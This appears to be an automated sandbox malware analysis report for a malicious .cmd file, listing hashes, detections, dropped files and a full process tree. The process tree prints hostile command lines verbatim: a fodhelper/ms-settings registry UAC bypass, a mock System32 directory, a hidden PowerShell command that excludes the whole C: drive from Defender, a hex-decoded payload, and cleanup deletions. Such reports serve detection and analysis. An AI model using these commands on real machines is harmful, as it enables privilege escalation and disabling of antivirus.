b674ad0e45e6f4c347e8059af90394c05163e28613694bc57c5284f482faf88c

General

Target

b674ad0e45e6f4c347e8059af90394c05163e28613694bc57c5284f482faf88c.cmd
Size

2.4MB
MD5

2acd509e492f212f252113b8a572657c
SHA1

281f0f0f9bc8af9e060417fb1c593962877687a0
SHA256

b674ad0e45e6f4c347e8059af90394c05163e28613694bc57c5284f482faf88c
SHA512

68ff228e57ac79774e9c2a88f0dee6cd3a63c02f3d9b4c93cda089fad70309d87df0ac9e3795849313b6455c6e168363e378607114380fbececb9a989c63054b
SSDEEP

24576:vu6hz/Ca7b8Olc80Ck06GIUEyoaPjyeNwVEULLD2XCn+RCN1DVkY67:vuAbCasOl/nk0AyXjRYVLC7

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 24 IoCs

Processes:

alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
2252	alpha.exe
2936	alpha.exe
3000	alpha.exe
2548	alpha.exe
2604	kn.exe
2588	alpha.exe
2708	alpha.exe
2416	alpha.exe
2700	alpha.exe
2444	xkn.exe
2864	alpha.exe
2440	ger.exe
2860	alpha.exe
1060	kn.exe
632	alpha.exe
320	Ping_c.pif
356	alpha.exe
996	alpha.exe
1600	alpha.exe
112	alpha.exe
2304	alpha.exe
2276	alpha.exe
1448	alpha.exe
2724	alpha.exe

Loads dropped DLL 19 IoCs

Processes:

cmd.exealpha.exealpha.exexkn.exealpha.exealpha.exeWerFault.exe

pid	process
2768	cmd.exe
2768	cmd.exe
2768	cmd.exe
2768	cmd.exe
2548	alpha.exe
2768	cmd.exe
2768	cmd.exe
2768	cmd.exe
2768	cmd.exe
2700	alpha.exe
2444	xkn.exe
2444	xkn.exe
2444	xkn.exe
2864	alpha.exe
2768	cmd.exe
2860	alpha.exe
2768	cmd.exe
2908	WerFault.exe
2908	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2908 320 WerFault.exe Ping_c.pif
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1256 taskkill.exe

pid	pid_target	process	target process
2908	320	WerFault.exe	Ping_c.pif

pid	process
1256	taskkill.exe

Modifies registry class 5 IoCs

Processes:

ger.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

Ping_c.pif

pid process

320 Ping_c.pif
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

xkn.exe

pid process

2444 xkn.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

xkn.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 2444 xkn.exe
Token: SeDebugPrivilege 1256 taskkill.exe

pid	process
320	Ping_c.pif

pid	process
2444	xkn.exe

description	pid	process
Token: SeDebugPrivilege	2444	xkn.exe
Token: SeDebugPrivilege	1256	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 2768 wrote to memory of 2188	2768	cmd.exe	extrac32.exe
PID 2768 wrote to memory of 2188	2768	cmd.exe	extrac32.exe
PID 2768 wrote to memory of 2188	2768	cmd.exe	extrac32.exe
PID 2768 wrote to memory of 2252	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2252	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2252	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2936	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2936	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2936	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 3000	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 3000	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 3000	2768	cmd.exe	alpha.exe
PID 3000 wrote to memory of 2932	3000	alpha.exe	extrac32.exe
PID 3000 wrote to memory of 2932	3000	alpha.exe	extrac32.exe
PID 3000 wrote to memory of 2932	3000	alpha.exe	extrac32.exe
PID 2768 wrote to memory of 2548	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2548	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2548	2768	cmd.exe	alpha.exe
PID 2548 wrote to memory of 2604	2548	alpha.exe	kn.exe
PID 2548 wrote to memory of 2604	2548	alpha.exe	kn.exe
PID 2548 wrote to memory of 2604	2548	alpha.exe	kn.exe
PID 2768 wrote to memory of 2588	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2588	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2588	2768	cmd.exe	alpha.exe
PID 2588 wrote to memory of 2396	2588	alpha.exe	extrac32.exe
PID 2588 wrote to memory of 2396	2588	alpha.exe	extrac32.exe
PID 2588 wrote to memory of 2396	2588	alpha.exe	extrac32.exe
PID 2768 wrote to memory of 2708	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2708	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2708	2768	cmd.exe	alpha.exe
PID 2708 wrote to memory of 2692	2708	alpha.exe	extrac32.exe
PID 2708 wrote to memory of 2692	2708	alpha.exe	extrac32.exe
PID 2708 wrote to memory of 2692	2708	alpha.exe	extrac32.exe
PID 2768 wrote to memory of 2416	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2416	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2416	2768	cmd.exe	alpha.exe
PID 2416 wrote to memory of 1892	2416	alpha.exe	extrac32.exe
PID 2416 wrote to memory of 1892	2416	alpha.exe	extrac32.exe
PID 2416 wrote to memory of 1892	2416	alpha.exe	extrac32.exe
PID 2768 wrote to memory of 2700	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2700	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2700	2768	cmd.exe	alpha.exe
PID 2700 wrote to memory of 2444	2700	alpha.exe	xkn.exe
PID 2700 wrote to memory of 2444	2700	alpha.exe	xkn.exe
PID 2700 wrote to memory of 2444	2700	alpha.exe	xkn.exe
PID 2444 wrote to memory of 2864	2444	xkn.exe	alpha.exe
PID 2444 wrote to memory of 2864	2444	xkn.exe	alpha.exe
PID 2444 wrote to memory of 2864	2444	xkn.exe	alpha.exe
PID 2864 wrote to memory of 2440	2864	alpha.exe	ger.exe
PID 2864 wrote to memory of 2440	2864	alpha.exe	ger.exe
PID 2864 wrote to memory of 2440	2864	alpha.exe	ger.exe
PID 2768 wrote to memory of 2860	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2860	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2860	2768	cmd.exe	alpha.exe
PID 2860 wrote to memory of 1060	2860	alpha.exe	kn.exe
PID 2860 wrote to memory of 1060	2860	alpha.exe	kn.exe
PID 2860 wrote to memory of 1060	2860	alpha.exe	kn.exe
PID 2768 wrote to memory of 632	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 632	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 632	2768	cmd.exe	alpha.exe
PID 632 wrote to memory of 1256	632	alpha.exe	taskkill.exe
PID 632 wrote to memory of 1256	632	alpha.exe	taskkill.exe
PID 632 wrote to memory of 1256	632	alpha.exe	taskkill.exe
PID 2768 wrote to memory of 320	2768	cmd.exe	Ping_c.pif

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\b674ad0e45e6f4c347e8059af90394c05163e28613694bc57c5284f482faf88c.cmd"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2768

C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
2⤵
PID:2188

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
2⤵
- Executes dropped EXE
PID:2252

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:2936

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3000

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:2932

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\b674ad0e45e6f4c347e8059af90394c05163e28613694bc57c5284f482faf88c.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2548

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\b674ad0e45e6f4c347e8059af90394c05163e28613694bc57c5284f482faf88c.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
3⤵
- Executes dropped EXE
PID:2604

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2588

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
3⤵
PID:2396

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
3⤵
PID:2692

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2416

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
3⤵
PID:1892

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2700

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2864

C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
5⤵
- Executes dropped EXE
- Modifies registry class
PID:2440

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2860

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
3⤵
- Executes dropped EXE
PID:1060

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:632

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1256

C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 320 -s 676
3⤵
- Loads dropped DLL
- Program crash
PID:2908

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
2⤵
- Executes dropped EXE
PID:356

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:996

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
2⤵
- Executes dropped EXE
PID:1600

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:112

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2304

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2276

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1448

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Libraries\Ping_c.pif
Filesize
805KB

MD5
8cd46fdaaf913a77e8d4602aaef6151a

SHA1
276cb976909b2295e3416284efa512bc56edb23e

SHA256
980a0acdae47a216c67f61b242060890464e58c3a25a6903241ab8aebcbf434d

SHA512
587ff6d237330a615a9178f5d8ba348bf1282058debe1abefb2c4022567786efe12e3a9ab7a5f706332dada5a4a94808a4259e307244562d68e691d4032cc08b

Download Submit
C:\Users\Public\Ping_c.mp4
Filesize
1.6MB

MD5
d6fd0173f9ff47262d558e3022ced522

SHA1
5191843a6af9afedf85c1bd86fbf4350e3bcf1d4

SHA256
d1fa0ef2bf6519de2b67a5177626e86b92acb759182cfa8e722df134288e4b56

SHA512
6a22ae6c315100097d8eb3c08fb4093f2541a78b326e4474c0e06c5f0e8ec09ffdc4363c4454897961d61e8688322eccfbe896f1a1ff79466d1b76295d13ea71

Download Submit
C:\Users\Public\alpha.exe
Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
C:\Users\Public\ger.exe
Filesize
73KB

MD5
9d0b3066fe3d1fd345e86bc7bcced9e4

SHA1
e05984a6671fcfecbc465e613d72d42bda35fd90

SHA256
4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

SHA512
d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

Download Submit
C:\Users\Public\kn.exe
Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
C:\Users\Public\xkn.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/320-75-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/2444-43-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

Filesize
2.9MB

Download
memory/2444-44-0x0000000000470000-0x0000000000478000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads